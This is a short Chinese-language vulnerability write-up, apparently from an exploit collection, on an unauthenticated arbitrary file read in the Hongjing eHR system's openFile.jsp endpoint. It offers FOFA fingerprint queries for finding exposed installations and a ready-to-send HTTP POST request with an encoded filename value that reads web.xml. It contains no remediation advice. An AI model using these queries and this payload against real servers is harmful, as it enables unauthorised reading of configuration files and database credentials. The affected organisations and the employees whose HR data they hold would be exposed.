H1-22宏景-人力资源管理-任意文件读取
漏洞描述:
宏景eHR openFile.jsp 接口处存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
网站图片:
fofa语法:
body=“<div class="hj-hy-all-one-logo"“||title=“人力资源信息管理系统”||body=“/general/sys/hjaxmanage.js”
漏洞复现:
读取 web.xml 配置文件
payload:
POST /templates/attestation/./general/muster/hmuster/openFile.jsp HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
x-auth-token: d9eaeacd5de1008fd43f737c853dcbcb
Content-Type: application/x-www-form-urlencoded
filename=8uHo1M8Ok6bZ468mKmzw70ounZHwKUWnpVOrvOAV6WoPAATTP3HJDPAATTP
效果图: